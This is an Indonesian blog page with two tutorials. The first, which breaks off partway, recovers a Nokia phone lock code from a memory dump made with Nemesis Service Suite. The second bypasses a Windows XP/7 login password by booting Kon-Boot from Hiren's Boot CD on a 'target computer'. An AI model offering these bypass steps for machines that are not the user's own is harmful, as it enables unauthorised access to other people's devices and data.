Mungkin diantara kalian ada yang pernah mengalami atau malah sedang mengalaminya. Saya sudah coba pakai “PHONE LOCK” UNLOCKER FOR NOKIA BB5, NOKIA MASTER CODE, WorldUnlock Kalkulator, dan berbagai cara dari pakai program sampai pakai tools online tidak ada yang berhasil satupun ;). Kalau dibawa ke counter pasti makan waktu, nambah biaya lagi, yang paling parah pasti diflash  ulang dan konsekuensinya data pasti hilang. OK, tidak usah panjang lebar langsung ke topik pembicaraan. Oh ya saya lupa, di sini saya menggunakan Hand Phone Nokia 5320 Express Music.

• Download dan Install NSS (Nemesis Service Suite), di sini saya menggunakan Nemesis Service Suite Beta 1.0.38.15

•  Hubungkan HandPhone kalian dengan mode PC Suite pada Komputer/Notebook/Netbook menggunakan kabel data.

• Buka aplikasi NSS-nya.
• Kemudian klik pada button “Scan for new device” di pojok kanan atas.
• Pada menu utama silahkan klik pada tab Phone Info.
• Jika Hand Phone belum terdeteksi silahkan klik button “Scan”.
• Setelah HandPhone sudah terdeteksi kemudian klik pada tab “Permanent Memory”.
• Pada menu “Permanent Memory” silahkan klik pada button “Read”. Tunggu sampai proses “Read” selesai.
• Setelah proses “Read” selesai, silahkan buka Windows Explore kemudian masuk ke direktori :
  C:\Program Files\NSS\Backup\pm
•  Kemudian cari file yang menggunakan ekstensi *.pm   
• Buka File tersebut menggunakan notepad atau wordpad atau program pengolah kata lainnya kesukaan kalian. Saya sarankan pakai notepad atau wordpad untuk mempermudah pencarian.
• Scroll sampai kalian menemukan baris [308].

   

•   Cari angka yang menggunakan angka tiga (3) sebagai pemisah. Contoh :  5=35333230300000000000

• Jika sudah ketemu silahkan hapus sepuluh digit angka nol (0) yang berderet dibelakang.
  Contoh di atas akan menjadi 3533323030
•  

Tutorial | Cara ByPass Password Windows

Pada artikel ini saya akan berbagi sedikit pengalaman saya saat keingin tahuan merajai jiwa yaitu cara mem-By Pass Password Windows XP & Windows 7 .

Langsung saja ya, siapkan peralatannya, disini kita memakai Hiren Boot V 10.6

Kita hanya butuh 1 software aplikasi untuk membantu pekerjaan kita, Hiren Boot V 10.6 ini kurang lebihnya mempunyai size 200MB, cukup ringan bukan? Tapi jangan tanya lagi, ada banyak manfaatnya. Dijamin tidak akan rugi download file 200MB ini

Kalau sudah sobat download silahkan Burn ke CD file Hirennya,dan ikuti langkah ini :

LANGKAH PERTAMA

Restart komputer target dan masuk BIOS.
Lalu setting pada bagian Boot Device Prioritynya ubah ke CD, ini dilakukan karena kita ingin booting lewat CD Hiren tadi, sekiranya seperti gambar dibawah ini:

LANGKAH KEDUA

Masih dihalaman BIOS. Lalu masukan CD hiren yang telah di Burn tadi, lalu tekan F10 dan ENTER.

LANGKAH KETIGA

Setelah booting ke CD maka akan tampil seperti dibawah ini :

LANGKAH KEEMPAT

Pilih “Kon Boot” dengan cara arahkan pada Kon Boot lalu tekan Enter,tunggu beberapa detik dan akan keluar tampilan seperti dibawah ini :

LANGKAH KELIMA

Tunggu beberapa detik lagi dan taraaa kita bisa masuk windows tanpa password.